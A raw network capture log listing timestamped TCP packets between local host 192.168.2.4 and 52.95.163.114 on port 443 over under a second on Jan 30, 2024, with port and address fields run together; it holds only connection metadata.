                                                                            Jan 30, 2024 13:32:42.043839931 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043864965 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.043893099 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043924093 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.043936968 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043953896 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043962955 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.043967962 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044025898 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044025898 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044027090 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044049978 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044076920 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044099092 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044099092 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044106007 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044115067 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044136047 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044156075 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044181108 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044193983 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044202089 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044214010 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044337034 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044344902 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044431925 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044434071 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044445038 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044461966 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044490099 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044497013 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044574022 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044579983 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044589996 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044595003 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044610977 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044617891 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044631004 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044652939 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044725895 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044749022 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044755936 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044787884 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044857025 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044862032 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044907093 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044928074 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044929981 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044943094 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.044951916 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044987917 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.044996023 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.045041084 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.104789972 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.104829073 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.104895115 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.104895115 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.104916096 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.104935884 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.104962111 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.104970932 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.104984999 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.104990005 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.105073929 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.105073929 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.105087042 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.105417013 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271002054 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271040916 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271070957 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271083117 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271146059 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271146059 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271155119 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271212101 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271531105 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271558046 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271588087 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271595001 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271631002 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271636963 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271852016 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271887064 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271908998 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271924019 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.271954060 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.271987915 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272021055 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272027016 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272047043 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272241116 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272242069 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272264004 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272288084 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272317886 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272332907 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272353888 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272361994 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272377968 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272408962 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272429943 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272428989 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272449017 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272464037 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272568941 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272597075 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272605896 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272659063 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272671938 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272722960 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272741079 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272763968 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272804022 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272824049 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272830963 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.272852898 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272926092 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.272980928 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273001909 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273056984 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273078918 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273078918 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273087025 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273103952 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273113012 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273137093 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273139954 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273154974 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273168087 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273269892 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273304939 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273312092 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273339033 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273447037 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273477077 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273483992 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273510933 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273607016 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273638964 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273646116 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273669958 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273793936 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273830891 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273838997 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273866892 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273910999 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.273917913 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273932934 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273963928 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.273991108 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.274007082 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.274051905 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.274075985 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.274079084 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.274080038 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.274096012 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.274110079 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.274333954 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.274374962 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.274380922 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.274399996 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.274413109 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.274444103 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.274504900 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.274524927 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.507705927 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.507733107 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.507740021 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.507767916 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.507857084 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.507880926 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.507886887 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.507910967 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.507976055 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.508003950 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.508009911 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.508037090 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.508102894 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.508109093 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.508198977 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.508274078 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.508925915 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.562176943 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562207937 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562237978 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.562244892 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562282085 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.562289000 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562494040 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.562733889 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562766075 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562793970 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.562800884 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562820911 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.562846899 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.562851906 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562886953 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.562963963 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.562988997 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563018084 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563023090 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563046932 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563071012 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563081026 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563103914 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563121080 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563127041 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563146114 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563160896 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563179016 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563184023 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563214064 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563239098 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563244104 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563256025 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563275099 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563277960 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563292027 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563298941 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563334942 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563345909 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563405991 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563406944 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563419104 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563441038 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563456059 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563481092 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563484907 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563498974 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563503981 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563519955 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563539028 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563574076 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563594103 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563617945 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563623905 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563648939 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563668013 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563672066 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563711882 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563730955 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563750982 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563776970 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563782930 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563807964 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563827038 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563838959 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563859940 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563884020 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563906908 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563915968 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.563941956 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563968897 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.563972950 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.564045906 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.564065933 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.564091921 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.564100027 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.564130068 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.564153910 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.726931095 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.726972103 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727011919 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727039099 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727049112 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727094889 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727169037 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727200031 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727246046 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727247000 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727261066 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727288961 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727320910 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727324009 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727338076 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727361917 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727389097 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727394104 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727427006 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727453947 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727457047 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727493048 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727509975 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727541924 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727591038 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727597952 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727612972 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727632999 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727756977 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727777004 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727802992 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727807999 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727821112 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727840900 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.727844000 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.727880001 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728223085 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728244066 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728272915 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728305101 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728319883 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728331089 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728355885 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728436947 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728461981 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728488922 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728493929 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728580952 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728580952 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728585958 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728615046 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728636026 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728643894 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728658915 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728668928 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728694916 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728718996 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.728722095 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.728957891 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729161978 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.729192019 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.729223013 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729229927 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.729254007 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729271889 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729274988 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.729309082 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729435921 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.729459047 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.729490995 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.729491949 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729502916 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.729516029 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729537010 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729553938 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.729669094 CET4434973552.95.163.114192.168.2.4
